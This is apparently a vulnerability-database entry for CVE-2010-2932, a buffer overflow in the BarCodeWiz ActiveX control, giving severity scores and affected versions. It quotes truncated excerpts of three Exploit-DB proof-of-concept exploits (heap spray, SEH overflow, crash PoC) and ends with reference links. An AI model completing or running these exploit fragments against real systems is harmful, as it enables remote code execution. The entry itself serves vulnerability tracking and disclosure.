CVE-2010-2932
Published 2010-08-05
Priority: P350
Severity: critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.90% (93.3th percentile)
Buffer overflow in BarCodeWiz BarCode 3.29 ActiveX control (BarcodeWiz.dll) allows remote attackers to execute arbitrary code via a long argument to the LoadProperties method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| barcodewiz | barcode_activex_control | — | — |
No detection rules found.
Exploit-DB
Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray (Internet Explorer 6/7)
exploitdb·2010-07-31
---
// Payload is win32_exec - calc.exe
nops=unescape('%u9090%u9090');
headersize = 69; //size adjusted for IE6/IE7 "universality"
slackspace= headersize + shellcode.length;
whil
Exploit-DB
Barcodewiz Barcode ActiveX Control 3.29 - Remote Buffer Overflow (SEH)
exploitdb·2010-07-30
---
# BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)
# Bug found: 24th July 2010
# Author: loneferret
# Software: http://www.barcodewiz.com/
# Nods to exploit-db.com
# Vulnerable file BarCodeWiz.dll
# LoadProperties method
# Tested on: Windows XP Professional SP3 with Internet Explorer 6
# [Needs adjustment for Internet Explorer 7]
# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 July 2010
#
# Shellcode calc.exe
#
----HTML FILE FROM HERE ON-----
buffer = String(97,"A")
jmp = unescap
Exploit-DB
Barcodewiz BarCode ActiveX 3.29 - Denial of Service (PoC)
exploitdb·2010-07-30
---
# BarCodeWiz Barcode ActiveX Control 3.29 PoC (SEH)
# Bug found: 24th July 2010
# Found by: loneferret
# Software: http://www.barcodewiz.com/
# Nods to exploit-db.com
# Vulnerable file BarCodeWiz.dll
# LoadProperties method
# Tested on:
# Windows XP Professional SP3 & Windows XP Home SP3
# Internet Explorer 6 & Internet Explorer 7
# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 July 2010
# CPU Registers Information
#
# EAX 7EFEFEFE
# ECX 0013FBF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
No writeups or analysis indexed.
http://secunia.com/advisories/40786
http://www.exploit-db.com/exploits/14504
http://www.exploit-db.com/exploits/14505
http://www.exploit-db.com/exploits/14519
http://www.securityfocus.com/bid/42097
https://exchange.xforce.ibmcloud.com/vulnerabilities/60838